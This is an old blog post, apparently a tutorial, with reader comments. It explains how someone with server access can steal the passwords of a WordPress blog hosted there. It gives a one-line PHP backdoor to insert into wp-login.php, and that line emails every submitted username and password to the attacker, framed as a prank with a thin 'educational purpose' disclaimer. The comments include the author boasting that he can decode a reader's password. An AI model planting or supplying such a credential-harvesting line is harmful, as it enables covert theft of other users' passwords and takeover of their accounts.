Stealing WordPress blog passwords when having server access20 Apr 2007, 129 read(s)
Tags:
Someone else is hosting his/her WordPress blog on your website? No problem! Let the encrypted passwords in the database not scare you...
This is a very simple and effective technique for stealing passwords. At least you can bug your friends ... However, remember you must have access to the server files. Useful when you and your friends are sharing the same server.
Change the files
First, enter in the directory where the WordPress blog files are located using a FTP client. Download the file wp-login.php (located in the main directory of the blog files). Now open this file and add the following line just after the first line (<?php):
wp-login.php <?php if($_POST["pwd"] != "") mail("youremail@server.com", "WP hacked pass", "user: ". $_POST["log"]. " pass:". $_POST["pwd"]);
Then save the file and overwrite the one on the server. Now, applying this simple line of code, you will receive the username and password of each user that tries to login (no matter successfully or not). A much subtler code can be written, but this tiny little line here accomplishes the job. 
PS: Use it at your own risk. Written with educational purpose. I am not responsible for any damage caused by the line above and do not guarantee that it works.
Comments dk: bravo!
But ... the user must login and then you will get the pass ..... ... so - what is my pass?  Martin Tsarev: Oh, believe me, I can decode your password. It will take some time, but it's possible... dk: I thought that you already have it!!!! ... but you don't ... nice... Martin Tsarev: Actually, I do have it.  dk: All letters were replaced :-P Anonymous: |
